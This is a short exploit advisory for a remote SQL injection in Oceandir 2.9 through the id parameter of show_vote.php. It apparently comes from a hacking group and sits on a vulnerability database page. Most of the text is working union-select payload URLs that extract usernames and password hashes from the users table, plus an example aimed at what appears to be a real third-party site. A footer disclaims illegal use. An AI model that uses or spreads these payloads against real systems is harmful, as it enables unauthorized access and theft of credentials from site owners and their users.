/** * @title Oceandir <= 2.9 (show_vote.php id) Remote SQL injection * @author JEEN HACKER TEAM [ Jeen + Secertry ] * @cost 250$ * @script http://www.oceandir.com * @copyright 2008 * @homepage http://www.hackteach.org/cc/teach.php * @email SVN@HOTMAIL.COM , CPY@HOTMAIL.COM */ Exploit : ~user http://www.site.com/dir/show_vote.php?id=-1+union+select+user_id,fname,3,4+from+users ~passwd http://www.site.com/dir/show_vote.php?id=-1+union+select+1,hashed_pw,3,4+from+users Example : #### http://www.dir.qatarw.com/show_vote.php?id=-1+union+select+user_id,fname,3,4+from+users http://www.dir.qatarw.com/show_vote.php?id=-1+union+select+1,hashed_pw,3,4+from+users #### Greetz : www.hackteach.org user's
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论